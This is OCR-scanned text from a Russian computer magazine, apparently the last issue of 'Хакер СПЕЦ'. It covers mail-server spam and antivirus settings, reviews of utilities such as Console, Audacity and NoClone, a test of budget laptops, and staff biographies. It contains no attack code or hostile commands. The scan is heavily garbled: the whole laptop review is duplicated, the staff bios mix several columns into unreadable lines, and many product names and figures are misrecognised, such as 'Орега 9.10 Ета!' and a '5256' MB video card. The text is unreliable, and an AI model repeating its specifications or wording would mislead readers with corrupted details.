существует тайм-аут на ответ серве- 
ра на приветствие. Что-то около 30 
секунд. Спамерские программы не 
могут ждать так долго, ведь им нуж- 
но отсылать сотни тысяч сообщений 
и тайм-аут ожидания ответа у них 
очень маленький. Таким образом, 
выставляя значение задержки при- 
ветствия, мы этих торопыг отсекаем. 
Единственная трудность, тайм-аут 
задержки приветствия не должен 
быть сильно большим, дабы не от- 
сечь и нормальные серверы. 


Со спамом разобрались, пере- 
ходим в закладку «Фильтр содержи- 
мого» -» «Антивирус». 

Если ты приобрел почтовый 
сервер со встроенным антивирусом, 
то в этой закладке ты настраиваешь 
сам антивирус и его действия с за- 
раженным письмом. Все можно ос- 
тавить по умолчанию, за одним иск- 
лючением. Тебе необходимо создать 
админский почтовый ящик, на кото- 
рый будут сыпаться все письма, дос- 
тавленные и не доставленные твоим 
юзерам. Придумай себе такой ящик. 
Теперь в поле «Если в сообщении 
обнаружен вирус» в дополнение 
к отмеченному галочкой полю «Уда- 
лить сообщение» отметь еще и «Пе- 
реадресовать исходное сообщение 
администратору» и введи сюда свой 
админский ящик. Бывает, что неко- 
торые сообщения антивирус не мо- 
жет проверить, принимает их за нез- 
накомый вирус и удаляет. Вот если 
такое произошло, а письмо на са- 
мом деле было нужным, то почто- 
вый сервер отправит пользователю 
сообщение об удаленном письме, 

а само письмо придет на твой адми- 
нский ящик, и ты всегда сможешь 


Настройка «черных списков» 


вернуть его юзеру. Единственный 
недостаток всего этого — письма 
с вирями будут приходить на твой 
админский ящик не вылеченными. 
Так что защищайся! 

Все то же самое проделай 
и в закладке «Фильтр содержимо- 
го»-+ «Фильтр вложений». Здесь OT- 
мечаешь галочкой «Включить 
фильтр вложений», просматриваешь 
предлагаемый тебе список вложе- 
ний, оставляешь в нем необходимые 
для контроля и перенаправляешь 
сообщения с вложениями на свой 
админский ящик. Теперь, если поль- 
зователю придет письмо с недопус- 
тимым вложением, почтовик 
это вложение вырежет и отправит 
юзеру предупреждение, а тебе 
на админский ящик придет это же 
письмо с нетронутым вложением. 
Если оно будет необходимо, 
ты всегда вернешь его юзеру. 

В следующий раз мы продол- 
жим ковырять наше мыло © 


Создание учетной записи 
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утилиты 


ПОДБОРКА СВЕЖИХ ПРОГРАММ ОТ СПЕЦА 
ЮРИЙ НАУМОВ 


Console 2.00.127 
sourceforge.net/projects/console 

Freeware 

Вот уж что-что, а нормальную консоль (стандартную Windows 

во внимание не брать) я искал уже очень давно. Консоль — мегау- 
добная вещь в непрерывном процессе работы под виндой. Всегда 
хотелось, чтобы она была красивая и удобная, а главное — 

не уступала в производительности ста. Если первым двум факто- 
рам удовлетворял практически любой продукт (а их на самом деле не так уж много), то хорошей 
реализацией третьего практически никто не мог похвастаться. И вот мне на глаза попалась кон- 
солька — проект на sourceforge.net. Отличный релиз усовершенствованной стандартной консоли Win- 
dows! Автор смог совместить простоту, красоту и удобство оболочки для командных интерпретато- 
ров (cmd, bash, etc) абсолютно без потери производительности. В качестве достоинств консоли мо- 
гу отметить закладки (возможность работать сразу с несколькими консолями одновременно), визу- 
альные решения (гибкая настройка фонов, цветов, шрифта), возможность выделения текста (как в 


блокноте). Консоль не требует установки и является portable software. 


Audacity 1.2.6 

audacity.sourceforge.net 

Freeware 

Еще один проект под крылышком sourceforge.net — простой 

в использовании звуковой редактор. Audacity многопланен, 
может использоваться для записи звука, оцифровки инфор- 
мации с аналоговых носителей (например, старых добрых 
винилов), редактирования в различных форматах (wav, mp3, 
099): вырезания, сведения, склеивания, изменения высоты 
тона и скорости записи. В любой момент в Audacity можно 
добавить новые дополнительные примоч- 
ки (в том числе \/ЗТ-модули), — просто 
слить их с сайта проекта, и даже созда- 
вать собственные эффекты на простом 
встроенном языке. Audacity — кросс- 
платформенный звуковой редактор, ра- 
ботающий как под Windows, так и под 
Мас OS X, GNU/Linux и некоторых Unix. 
Помимо стабильной версии на сайте есть 
доступ к свежей бете 1.3.2. 


Advanced Vista 

Codec Package 4.2.0 
msfn.org 

Freeware 

Переход Ha Windows Vista неизбежен, если, 
конечно, не случится ничего сверхъесте- 
ственного. А значит, и многие инструмен- 
ты повседневного пользования должны перекочевать в све- 
жую среду. Предлагаю тебе универсальный набор кодеков, 
совместимый Kak с Windows ХР, так и с новой Вистой. Автор 
постарался на славу: в состав пакета входит все необходи- 
мое для получения максимального удовольствия от просмо- 
тра фильмов и прослушивания музыки. В то же время в спис- 
ке отсутствуют совершенно ненужные веши: нет ни встроен- 
ного медиапроигрывателя, ни бесполезных инструментов 

и профайлов. В новой версии разработчики добились макси- 
мальной производительности при практически полном отсут- 
ствии конфликтов между установленными компонентами. 


NoClone Enterprise 
Edition 4 

noclone.net 

Shareware 

Для обладателей «несколькосо- 
тенгигабайтных» носителей ин- 
формации, для тех, кто устал сле- 
дить за неизвестно куда исчез- 
нувшим свободным местом и про- 
сто для любящих порядок на сво- 
ем винте... Довольно свежий ин- 
струмент для глобального обна- 
ружения любых дубликатов фай- 
лов на твоем жестком диске. 
NoClone предложит несколько ре- 
жимов уборки: проведение побай- 
тового (заметь, не по CRC) срав- 
нения, поиск по названиям или 
просто по схожести, в зависимо- 
сти от желаемого уровня очистки 
жизненно важного пространства. 
Достаточно высокая скорость по- 
иска, гибкая настройка целевых 
файлов и маски, возможность 
сохранения и загрузки сессии — 
все эти достоинства переместили 
дистрибутив в папку избранных 

у меня на диске. Надеюсь, те- 

бе тоже понравится. 


Vista Manager 1.0.3 
winxp-manager.com/vistamanager 
Shareware 


Продолжая тему стремительно наступающей Windows Vista, хочу предложить 
тебе первый довольно функциональный инструмент для гибкой настройки этого 
продукта Microsoft. Разработчик тулзы уже имеет опыт создания подобных про- 
грамм — предыдущий его продукт WinXP Manager до сих пор пользуется изряд- 
ной популярностью. По интерфейсу Vista Manager в точности напоминает своего 
старшего брата, а по содержанию включает в себя около 20 различных утилит, 
разделенных на несколько категорий. В основном возможности менеджера ана- 


логичны предыдущему продукту компании, да и твикерам в общем. Но такие 
утилиты как индексирование реестра и мастер очистки системы могут посоревноваться в качестве с подобными 
системными программами. В новой версии добавлена возможность резервного копирования электронной почты, 
а также обновлены некоторые системные модули. Vista Manager работает во всех версиях Windows Vista и ис- 


пользует .МЕТ Framework, уже встроенный в ОС. 
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Portable AnyReader 1.9.55 

anyreader.com/ru/ 

Shareware 

Очень даже неплохой инструмент для копирования данных с трудночита- 
емых носителей: CD/DVD-ancku, Flash, HDD, ZIP, сетей LAN, Wireless 
LAN, Bluetooth. Программа без проблем пере- 
варит ошибки, возникшие при чтении или ко- 
пировании данных, а также потерю соедине- 
ния. С помощью AnyReader можно не только 
считать данные с поврежденных носителей, 
но и копировать информацию внутри неста- 
бильной сети. В настройке программы указы- 
вается количество попыток на чтение, что по- 
могает работать с информацией разной степе- 
ни поврежденности. Огромным плюсом про- 
граммы, конечно, является портативность — 
прекрасно подойдет в качестве подручного ин- 
струмента на флешке. Имеет простой интер- 
фейс, довольно полную информацию по рабо- 
те и поддерживает русский язык. 


Lazy Setup 
CD 1.5 Pro 
autosetup.org.ru 
Shareware 

Тебе никогда He хо- 
телось собрать и за- 
писать диск со своим 
любимым софтом, 
который ты каждый 
раз ставишь снова 
и снова после оче- 
редного сноса Вин- 


тично раскиданных по всему пространству компакта, а автоматизировать 
установку своего добра и свести к минимуму количество никчемных ма- 
нипуляций. С помощью Lazy Setup можно сделать как раз такой «CD ав- 
томатической установки» — нужно лишь указать, какие программы сле- 
дует установить, а сам процесс инсталла Lazy Setup берет на себя. 

Она последовательно запускает файлы установки, жмет кнопки Next 

и Yes, выбирает элементы, вводит серийники, расставляет галочки «|! Ag- 
ree...» :). Настройка всех необходимых манипуляций производится в ад- 
министраторской части программы, где указываются кнопки/чеки/пере- 
ключатели, которые должны быть нажаты, что и куда должно быть введе- 
но и т.п. Прожиг установоч- 


ного компакта выполняет- 
ся непосредственно 

из программы. Таким об- 
разом, реально сэконо- 
мить на установке софта 
до 75% своего драгоцен- 
ного времени. По крайней 
мере, так заявляют разра- 
ботчики. Я им верю. 


Орега 9.10 Ета! 
орега.сот 

Freeware 

Этого участника сегодняшнего об- 
зора, надеюсь, не надо предста- 
влять. Орега — давно известный 
инструмент для серфинга мирово- 
го сетевого пространства — проч- 
но завоевал почтение пользовате- 
лей. Его сравнительно небольшие 
размеры, скорость работы и 
обильная палитра настроек позво- 
ляют сделать путешествие по Сети 
максимально эффективным, удоб- 
ным и безопасным. В Орега 9 бы- 
ло представлено огромное число 
инноваций. Теперь браузер воору- 
жен до зубов: клиент для p2p-ce- 
тей, BitTorrent, стандартный мене- 
джер загрузки файлов, !с-клиент, 
г5$-клиент, система виджетов (что- 
то вроде небольших плагинов, на- 
подобие гаджетов в Windows Vi- 
sta). В этой финальной версии раз- 
работчики потрудились над улуч- 
шением стабильности работы 
браузера и произвели положитель- 
ные изменения в Fraud Protection. 


Mudbox 1.0 Final 
mudbox3d.com 
Shareware 
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Easy CD-DA 
Extractor 10.0.3 
poikosoft.com 
Shareware 


Последняя на сегодняшний день 
версия несомненно лучшего ау- 
дио-риппера. Эта программа по- 
зволяет значительно упростить 
процесс копирования audioCD 

в другие форматы (mp3, wma, 
ogg, mp4, m4a, aac, FLAC, Mus- 
epack, vaf, wav, aiff 1 Monkey's 
Audio) с обходом защиты OT KO- 
пирования, способностью рабо- 
ты с поврежденными дисками 

и поддержкой технологии BURN- 
Proof. Таким же образом осу- 
ществляется и запись audioCD 

с указанных форматов, а также 
конвертация поддерживаемых 
форматов между собой. В про- 
грамму встроен плеер с под- 
держкой ID3, а в новой вер- 

сии — и ID3V2-Teros. Кстати, 
разработчики представили пол- 
ную поддержку UNICODE, улуч- 
шили нормализацию звука, бы- 
стродействие и интерфейс. Рип- 
пер доступен более чем на 30 
языках, в том числе и на вели- 
ком и могучем. 


Продукт совместных трудов профессиональных программистов, опытных 
3ЗО9-художников и известных разработчиков игр — программа для созда- 
ния качественных моделей с высокой детализацией. Пока информации 

о проекте немного, но, несомненно, его разработка будет вестись и в бу- 


финальной версией. 


дущем. Катализатором этому служит немалая заинтересо- 
ванность известных людей в области ЗО9-моделирования 

и разработки игр. Среди особенностей Mudbox отмечается 
максимально большая рабочая область, удобные инструмен- 
ты. 3D-cnon и их маски созданы на основе реализации слоев 
в Photoshop: копирование, объединение, группировка произ- 
водится похоже. Смею предположить — у проекта большое 
будущее. А пока есть возможность ознакомиться с первой 


ОФФТОПИК 


nard 


Доступная мобильность 


ТЕСТИРУЕМ НЕДОРОГИЕ НОУТБУКИ 
СЕРГЕЙ НИКИТИН 


> технологии. В современных дешевых ноутбуках наиболее часто 
встречаются встроенные видеоадаптеры, которые не способны на высо- 
кую производительность — это не позволяет на таких лэптопах наслаж- 
даться требовательными к графике играми. Да и общая производитель- 
ность, как мы и говорили выше, и как показывают тесты, падает. Второй 
проблемой выступает малое время автономной работы. Некоторые уст- 
ройства не смогли в связи с этим пройти в режиме автономной работы 
тест PCMark 2005, заряд в батарее просто заканчивался раньше, чем сам 
тест. Поэтому если ты планируешь работать в дороге, то обрати на этот 
параметр самое тщательное внимание! К неоспоримым плюсам таких де- 
вайсов относятся сильные основные компоненты (двуядерные процессо- 
ры, количество памяти, универсальные оптические приводы и т.д.) и на- 
личие всевозможных средств связи, включая беспроводные. К некоторым 
мобильным ПК прикладываются обширные наборы фирменного програм- 
много обеспечения, которые делают работу устройства более быстрой, 
удобной и безопасной. 


> — методика тестирования. Чтобы выяснить все самым тщательным обра- 
зом, мы разработали специальную методику тестирования, которая учитыва- 
ет все нюансы работы мобильных компьютеров. Тесты проводились в двух 
режимах: при питании от сети и при автономной работе. В самом начале 

с помощью утилиты Lavalys Everest мы получали подробнейшую информа- 
цию о системе. Заодно запускался встроенный в нее мониторинг температу- 
ры процессора, чипсета и жесткого диска. Потом, используя утилиты S&M 
(нагрузка процессора) и ThrottleWatch (логирует частоту процессора, напря- 
жение и некоторые другие параметры), мы выясняли правильность работы 
данного ПК по схемам питания Always Оп (при работе от сети) и Laptop (при 
работе от аккумулятора). Дело в том, что если от сети ноутбуки работают 
нормально, то в режиме Laptop они могут вести себя «неправильно» — 

не снижать яркость экрана, не сбрасывать частоту работы и напряжение 
процессора, что негативно отражается на времени работы, и результаты тес- 
тов получаются некорректными. Если все было нормально, запускался тес- 
товый комплект: бенчмарки 3DMark 2001 SE, 3DMark 2003, 3DMark 2003, 
PCMark 2004 и PCMark 2005. При работе от батареи к ним добавлялась прог- 
рамма Battery Eater, при помощи которой мы определяли время автономной 
работы устройства. Также с помощью колориметра и утилиты OptiCAL мы 
строили колориметрическую диаграмму дисплея. 


ACER TRAVELMATE 
4222 WLMI 
($1100) 6 баллов 


ПРОЦЕССОР, ГГЦ: 1.66, Intel Core Duo T2300E 


ОПЕРАТИВНАЯ ПАМЯТЬ, MB: 1024 


РАЗМЕР ЭКРАНА, ДМ: 15.4 


ВИДЕОКАРТА, МБ: Intel СМА 950 


ЖЕСТКИЙ ДИСК, ГБ: 80 


ОПТИЧЕСКИЙ ПРИВОД: DVD+RW Super Multi 


СР-ВА СВЯЗИ: модем, LAN, Bluetooth, Wi-Fi 


ИНТЕРФЕЙСЫ: USB, mic, ear, PC-Card, VGA 


ГАБАРИТЫ, MM: 364x274.75x30 


ВЕС, КТГ: 2.95 


> плюсы. Стильно выглядящий 
ноутбук от компании Acer, обладаю- 
щий, к тому же, кучей фирменных 
утилит и технологий, улучшающих 
работу всего, что только возможно, 
и делающих ее удобнее и безопас- 
нее. Экран размером в 15.4" боль- 
шой и качественный, цвета яркие, 
и, вообще, — работать за ним при- 


ятно. В наличии есть также встроен- 
ные микрофон и меб-камера. Клави- 
атура мягкая и приятная, обладает 
несколько необычной формой. Вни- 
зу тачпада добавлена кнопка-джойс- 
тик для управления курсором — 
кому-то наверняка придется по ду- 
ше. Приятно, что за этим компом 
тебе не грозит одиночество — пол- 
ный набор средств связи к твоим 
услугам (модем, LAN, Bluetooth, 
Wi-Fi). А для общения с другими но- 
сителями есть универсальный опти- 
ческий привод и кард-ридер. 

> — минусы. Впечатление от неп- 
лохой, в общем, начинке портит 
встроенный видеоадаптер, который 
определенно мешает познать все 
прелести качественного экрана. 
Именно из-за него ноутбук не про- 
шел тесты 3DMark 2005 и 2006, 

да и вообще, учитывая конфигура- 
цию в целом, столь низкие показа- 
тели в тестах — это его работа. 


MSI МЕСАВООК 
$430 
($1199) 6 баллов 


ПРОЦЕССОР, ГГЦ: 1.8, AMD Sempron 


ОПЕРАТИВНАЯ ПАМЯТЬ, MB: 1024 


РАЗМЕР ЭКРАНА, ДМ: 14 


ВИДЕОКАРТА, MB: 256, NVIDIA GeForce Go 6100 


ЖЕСТКИЙ ДИСК, ГБ: 60 


ОПТИЧЕСКИЙ ПРИВОД: DVD-ROM 


СР-ВА СВЯЗИ: модем, LAN 


ИНТЕРФЕЙСЫ: USB, mic, ear, PC-Card, VGA 


ГАБАРИТЫ, MM: 330x275x26 


ВЕС, KT: 2.1 


> — плюсы. Эта модель, по сравне- 
нию с другим изделием MSI из на- 
шего обзора, имеет более стильный 
внешний вид и несколько улучшен- 
ную ситуацию с автономной рабо- 
той. Время жизни ноутбука от акку- 
мулятора немного выросло, но и 
скорость его зарядки также возрос- 


ла. Нампад исчез, клавиатура стан- 
дартная, что благоприятно сказа- 
лось на размерах клавиш и вообще 
на раскладке — не путаешься при 
нажатии. Корпус имеет два цвета, 
черный и серебряный, что, вкупе 

с нормальным видом кнопки Power, 
положительно сказалось на экстерь- 
ере устройства. Стоит отметить на- 
личие Wi-Fi адаптера и малые габа- 
риты устройства — это пригодится 
тем, кто планирует использовать 
его в дороге. 

> — минусы. Хоть и улучшенная, 
ситуация с автономным функциони- 
рованием довольно плачевна. 

Тест PCMark 2005 так и не был 
пройден — заряда не хватило. 
Встроенные компоненты, да и не 
встроенные тоже, довольно слабые, 
что объясняет такие невысокие 
результаты, полученные этим 
устройством. 


ROVERBOOK 
NAUTILUS W550 WH 
($1250) 9 баллов 


ПРОЦЕССОР, ГГЦ: 2.0, AMD Turion 64 Х2 TL-60 


ОПЕРАТИВНАЯ ПАМЯТЬ, МБ: 1024 


РАЗМЕР ЭКРАНА, ДМ: 15.4 


ВИДЕОКАРТА, MB: 5256, NVIDIA GeForce Go 7600 


ЖЕСТКИЙ ДИСК, ГБ: 100 


ОПТИЧЕСКИЙ ПРИВОД: DVD+RW DL 


СР-ВА СВЯЗИ: модем, LAN, Bluetooth, Wi-Fi 


ИНТЕРФЕЙСЫ: USB, mic, ear, PC-Card, 
S-Video, DVI, mini FireWire 


ГАБАРИТЫ, MM: 358x259x30 


ВЕС, КГ: 2.9 


> — плюсы. Ноутбук Rover очень 
похож Ha 675-ю модель от MSI: сра- 
зу бросаются в глаза схожие техни- 
ческие характеристики, элементы 
дизайна, а главное — наличие пол- 
ноценного NumPad'a. Абсолютно 
идентична и встроенная меБ-каме- 
ра, на том же месте расположен 
микрофон. Но начинка у детища 
Rover мощнее: более быстрый про- 
цессор AMD Turion 64 X2 TL-60 
(вместо TL-56 у M675) и более вмес- 
тительный жесткий диск (100 вместо 
80 Гб). Гигабайт оперативной памя- 
ти и видеоадаптер NVIDIA GeForce 
7600 Со присутствуют и ничем от 
аналогичных компонентов в девайсе 
от MSI не отличаются. Но главная 
проблема была решена: время авто- 
номной работы вполне приемлемое 
(почти два часа), все тесты были 
пройдены, причем с хорошими ре- 
зультатами, а восполнение заряда 
аккумуляторов происходит довольно 
быстро. Так что не перевелись еще 
умельцы на Руси! 

> — минусы. К сожалению, оста- 
лись все проблемы с кнопками. 
Из-за наличия нампада ужата кла- 
виатура, при наборе текста будешь 
путаться. Также присутствуют 
страшненькие и большие быстрые 
клавиши и кнопка Power. 


* 
* выбор * 


редакции 


* Ех 
хх 


ОФФТОПИК 
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Доступная мобильность 


ТЕСТИРУЕМ НЕДОРОГИЕ НОУТБУКИ 
СЕРГЕЙ НИКИТИН 


> технологии. В современных дешевых ноутбуках наиболее часто 
встречаются встроенные видеоадаптеры, которые не способны на высо- 
кую производительность — это не позволяет на таких лэптопах наслаж- 
даться требовательными к графике играми. Да и общая производитель- 
ность, как мы и говорили выше, и как показывают тесты, падает. Второй 
проблемой выступает малое время автономной работы. Некоторые уст- 
ройства не смогли в связи с этим пройти в режиме автономной работы 
тест PCMark 2005, заряд в батарее просто заканчивался раньше, чем сам 
тест. Поэтому если ты планируешь работать в дороге, то обрати на этот 
параметр самое тщательное внимание! К неоспоримым плюсам таких де- 
вайсов относятся сильные основные компоненты (двуядерные процессо- 
ры, количество памяти, универсальные оптические приводы и т.д.) и на- 
личие всевозможных средств связи, включая беспроводные. К некоторым 
мобильным ПК прикладываются обширные наборы фирменного програм- 
много обеспечения, которые делают работу устройства более быстрой, 
удобной и безопасной. 


> — методика тестирования. Чтобы выяснить все самым тщательным обра- 
зом, мы разработали специальную методику тестирования, которая учитыва- 
ет все нюансы работы мобильных компьютеров. Тесты проводились в двух 
режимах: при питании от сети и при автономной работе. В самом начале 

с помощью утилиты Lavalys Everest мы получали подробнейшую информа- 
цию о системе. Заодно запускался встроенный в нее мониторинг температу- 
ры процессора, чипсета и жесткого диска. Потом, используя утилиты S&M 
(нагрузка процессора) и ThrottleWatch (логирует частоту процессора, напря- 
жение и некоторые другие параметры), мы выясняли правильность работы 
данного ПК по схемам питания Always Оп (при работе от сети) и Laptop (при 
работе от аккумулятора). Дело в том, что если от сети ноутбуки работают 
нормально, то в режиме Laptop они могут вести себя «неправильно» — 

не снижать яркость экрана, не сбрасывать частоту работы и напряжение 
процессора, что негативно отражается на времени работы, и результаты тес- 
тов получаются некорректными. Если все было нормально, запускался тес- 
товый комплект: бенчмарки 3DMark 2001 SE, 3DMark 2003, 3DMark 2003, 
PCMark 2004 и PCMark 2005. При работе от батареи к ним добавлялась прог- 
рамма Battery Eater, при помощи которой мы определяли время автономной 
работы устройства. Также с помощью колориметра и утилиты OptiCAL мы 
строили колориметрическую диаграмму дисплея. 


ACER TRAVELMATE 
4222 WLMI 
($1100) 6 баллов 


ПРОЦЕССОР, ГГЦ: 1.66, Intel Core Duo T2300E 


ОПЕРАТИВНАЯ ПАМЯТЬ, MB: 1024 


РАЗМЕР ЭКРАНА, ДМ: 15.4 


ВИДЕОКАРТА, МБ: Intel СМА 950 


ЖЕСТКИЙ ДИСК, ГБ: 80 


ОПТИЧЕСКИЙ ПРИВОД: DVD+RW Super Multi 


СР-ВА СВЯЗИ: модем, LAN, Bluetooth, Wi-Fi 


ИНТЕРФЕЙСЫ: USB, mic, ear, PC-Card, VGA 


ГАБАРИТЫ, MM: 364x274.75x30 


ВЕС, КТГ: 2.95 


> плюсы. Стильно выглядящий 
ноутбук от компании Acer, обладаю- 
щий, к тому же, кучей фирменных 
утилит и технологий, улучшающих 
работу всего, что только возможно, 
и делающих ее удобнее и безопас- 
нее. Экран размером в 15.4" боль- 
шой и качественный, цвета яркие, 
и, вообще, — работать за ним при- 


ятно. В наличии есть также встроен- 
ные микрофон и меб-камера. Клави- 
атура мягкая и приятная, обладает 
несколько необычной формой. Вни- 
зу тачпада добавлена кнопка-джойс- 
тик для управления курсором — 
кому-то наверняка придется по ду- 
ше. Приятно, что за этим компом 
тебе не грозит одиночество — пол- 
ный набор средств связи к твоим 
услугам (модем, LAN, Bluetooth, 
Wi-Fi). А для общения с другими но- 
сителями есть универсальный опти- 
ческий привод и кард-ридер. 

> — минусы. Впечатление от неп- 
лохой, в общем, начинке портит 
встроенный видеоадаптер, который 
определенно мешает познать все 
прелести качественного экрана. 
Именно из-за него ноутбук не про- 
шел тесты 3DMark 2005 и 2006, 

да и вообще, учитывая конфигура- 
цию в целом, столь низкие показа- 
тели в тестах — это его работа. 


MSI МЕСАВООК 
$430 
($1199) 6 баллов 


ПРОЦЕССОР, ГГЦ: 1.8, AMD Sempron 


ОПЕРАТИВНАЯ ПАМЯТЬ, MB: 1024 


РАЗМЕР ЭКРАНА, ДМ: 14 


ВИДЕОКАРТА, MB: 256, NVIDIA GeForce Go 6100 


ЖЕСТКИЙ ДИСК, ГБ: 60 


ОПТИЧЕСКИЙ ПРИВОД: DVD-ROM 


СР-ВА СВЯЗИ: модем, LAN 


ИНТЕРФЕЙСЫ: USB, mic, ear, PC-Card, VGA 


ГАБАРИТЫ, MM: 330x275x26 


ВЕС, KT: 2.1 


> — плюсы. Эта модель, по сравне- 
нию с другим изделием MSI из на- 
шего обзора, имеет более стильный 
внешний вид и несколько улучшен- 
ную ситуацию с автономной рабо- 
той. Время жизни ноутбука от акку- 
мулятора немного выросло, но и 
скорость его зарядки также возрос- 


ла. Нампад исчез, клавиатура стан- 
дартная, что благоприятно сказа- 
лось на размерах клавиш и вообще 
на раскладке — не путаешься при 
нажатии. Корпус имеет два цвета, 
черный и серебряный, что, вкупе 

с нормальным видом кнопки Power, 
положительно сказалось на экстерь- 
ере устройства. Стоит отметить на- 
личие Wi-Fi адаптера и малые габа- 
риты устройства — это пригодится 
тем, кто планирует использовать 
его в дороге. 

> — минусы. Хоть и улучшенная, 
ситуация с автономным функциони- 
рованием довольно плачевна. 

Тест PCMark 2005 так и не был 
пройден — заряда не хватило. 
Встроенные компоненты, да и не 
встроенные тоже, довольно слабые, 
что объясняет такие невысокие 
результаты, полученные этим 
устройством. 


ROVERBOOK 
NAUTILUS W550 WH 
($1250) 9 баллов 


ПРОЦЕССОР, ГГЦ: 2.0, AMD Turion 64 Х2 TL-60 


ОПЕРАТИВНАЯ ПАМЯТЬ, МБ: 1024 


РАЗМЕР ЭКРАНА, ДМ: 15.4 


ВИДЕОКАРТА, MB: 5256, NVIDIA GeForce Go 7600 


ЖЕСТКИЙ ДИСК, ГБ: 100 


ОПТИЧЕСКИЙ ПРИВОД: DVD+RW DL 


СР-ВА СВЯЗИ: модем, LAN, Bluetooth, Wi-Fi 


ИНТЕРФЕЙСЫ: USB, mic, ear, PC-Card, 
S-Video, DVI, mini FireWire 


ГАБАРИТЫ, MM: 358x259x30 


ВЕС, КГ: 2.9 


> — плюсы. Ноутбук Rover очень 
похож Ha 675-ю модель от MSI: сра- 
зу бросаются в глаза схожие техни- 
ческие характеристики, элементы 
дизайна, а главное — наличие пол- 
ноценного NumPad'a. Абсолютно 
идентична и встроенная меБ-каме- 
ра, на том же месте расположен 
микрофон. Но начинка у детища 
Rover мощнее: более быстрый про- 
цессор AMD Turion 64 X2 TL-60 
(вместо TL-56 у M675) и более вмес- 
тительный жесткий диск (100 вместо 
80 Гб). Гигабайт оперативной памя- 
ти и видеоадаптер NVIDIA GeForce 
7600 Со присутствуют и ничем от 
аналогичных компонентов в девайсе 
от MSI не отличаются. Но главная 
проблема была решена: время авто- 
номной работы вполне приемлемое 
(почти два часа), все тесты были 
пройдены, причем с хорошими ре- 
зультатами, а восполнение заряда 
аккумуляторов происходит довольно 
быстро. Так что не перевелись еще 
умельцы на Руси! 

> — минусы. К сожалению, оста- 
лись все проблемы с кнопками. 
Из-за наличия нампада ужата кла- 
виатура, при наборе текста будешь 
путаться. Также присутствуют 
страшненькие и большие быстрые 
клавиши и кнопка Power. 


* 
* выбор * 


редакции 


* Ех 
хх 


crew 


личный состав 


ОФФТОПИК 


ПОСЛЕДНЯЯ ГАСТРОЛЬ АРТИСТА- 
СОЛИСТА ИМЕРАТОРСКОГО ТЕАТРА 
ДРАМЫ И КОМЕДИИ! СЕМЬ ДОЛГИХ 
ЛЕТ ЖУРНАЛ СПЕЦ ХАКЕР БЫЛ 

С ТОБОЙ. И ВОТ НАСТАЛ ВЕЛИКИЙ 
МОМЕНТ — МОМЕНТ ИСТИНЫ. 

ТЫ ДЕРЖИШЬ В РУКАХ ПОСЛЕДНИЙ 
НОМЕР ЖУРНАЛА, НАЗЫВАЮЩЕГОСЯ 
«СПЕЦ». НО НЕ СПЕШИ 
РАССТРАИВАТЬСЯ :), НИ ЖУРНАЛ, 

НИ ЕГО КОМАНДА НА САМОМ ДЕЛЕ 
НИКУДА НЕ ДЕНУТСЯ. ПРОСТО ОН 
БУДЕТ НАЗЫВАТЬСЯ ПО-ДРУГОМУ — 
«IT СПЕЦ», И В ОСНОВНОМ БУДЕТ 
РАССЧИТАН HA Т-СПЕЦИАЛИСТОВ 
РАЗЛИЧНЫХ КОМПАНИЙ, НО И ПРО 
НАШИХ ДОРОГИХ ЧИТАТЕЛЕЙ МЫ 
ЗАБЫВАТЬ НЕ НАМЕРЕНЫ :). В НОВОМ 
СПЕЦЕ БУДЕТ МНОЖЕСТВО РУБРИК 
(«БЕЗОПАСНОСТЬ», 
«ПРОГРАММИРОВАНИЕ», 
«ТЕНДЕНЦИИ»), КОТОРЫЕ БУДУТ 
ИНТЕРЕСНЫ И ТЕБЕ, А САМ ЖУРНАЛ, 
В ОТЛИЧИИ ОТ КЛАССИЧЕСКИХ B2B 
ИЗДАНИЙ, БУДЕТ РАСПРОСТРАНЯТЬСЯ 
В ТОМ ЧИСЛЕ И ПРЕЖНИМ ПОСОБОМ, 
ТО ЕСТЬ В РОЗНИЦУ. ОДНАКО Я 
НЕМНОГО ОТВЛЕКСЯ НА БУДУЩЕЕ. 
СЕГОДНЯ ЖЕ МЫ ЧЕСТВУЕМ КОМАНДУ 
— ПОЭТОМУ ВСТРЕЧАЙ ВСЕХ ТЕХ, КТО 
ВСЕ ЭТО ВРЕМЯ РАБОТАЛ НА АРЕНЕ 
БЕЗ СТРАХОВКИ. 


Александр Лозовский 
aka Dr.Klouniz 


редактор 

Для начала открою са- — брутальную обложку ство и выпускающее больницы (судя по 

мую страшную тайну — с грязной ногой :)). редакторство в обеих деньгам — больше 

у меня действительно После этого, некоторое журналах (Спец и Xa- хобби, работа — это 
высшее медицинское время в журнал я ниче-  кер, это произошло в все же журналы :)), 
образование (я закон- го не писал, зато регу- — 2003-м, хотя стоп, пос-  развлекаю себя подня- 
чил медфак РУДН) ия —лярно отмечался на кольку теперь выпуска- тием тяжестей и отжи- 
действительно никогда — хаКер.ги посредством ющий редактор должен rato на форумах типа 
не учился ни в каких статей, посвященных быть офисным сотруд- PMC (forums.rusmed- 
технических BY3'ax :). некоторым аспектам ником, я просто взял serv.com). A, ну еще пос- 
Моя первая статья про — вирусного программин- на себя больше редак- — лушиваю музыку, иног- 
кодинг сниффера выш- га на Берн :). Затемя — торской работы). да — такую же экстре- 
ла в Хакере в 2001 го- полностью переключил- По жизни — на мальную, как Карам- 
ду, в журнале, видоиз- = ся на статьи в кодинг данный момент тру- нофф, иногда — менее 
мененном великим ре- — Хакера, и наконец — жусь в приемном отде- — экстремальную, обыч- 


дизайном (все помнят погрузился в редактор- —лении одной городской HO — power metal. 


2 
Андрей Карамнов 
верстальщик 


Подвязался версталь- 
ЩИКоМ В «Хакер СПЕЦ» 
летом 2006 года, до 
этого сотрудничал с 
различными издательс- 
кими домами, выполняя 
аналогичную работу. 
Журнал заинтере- 
совал прежде всего 
нестандартным подхо- 
дом к выбору тем в но- 
мер, оригинальным их 
исполнением в лице 
наших дизайнеров и, 
конечно же, уникаль- 


6 

Николай Черепанов 
aka AvaLANche 
главный редактор 


У руля с 2003 года. 
Собственно, все, 

что происходило со 
«СПЕЦом» за послед- 
ние три с половиной 
года и происходит 
сейчас — на моей со- 
вести. 

Помимо работы в 
журнале, за это время 
я успел: получить дип- 
лом о высшем образо- 
вании по специальнос- 
TH «Физика», сменить 
специальность, но не 


ной творческой атмос- 
ферой во время сдачи 
номера в печать :-) 
(очень тактично сказа- 
но :) — прим. Dr.). Ценю 
ответственный и заин- 
тересованный подход 
ко всему, за что бе- 
решься; не приемлю 
такие человеческие ка- 
чества, как глупость и 
лень. Хобби: экстре- 
мальная музыка (тру 
митоллист! — прим. 
Ог.), литература. 


предать родной Москов- 
ский Университет, пой- 
дя на второе высшее, 
спустить несколько раз 
предпоследние штаны 
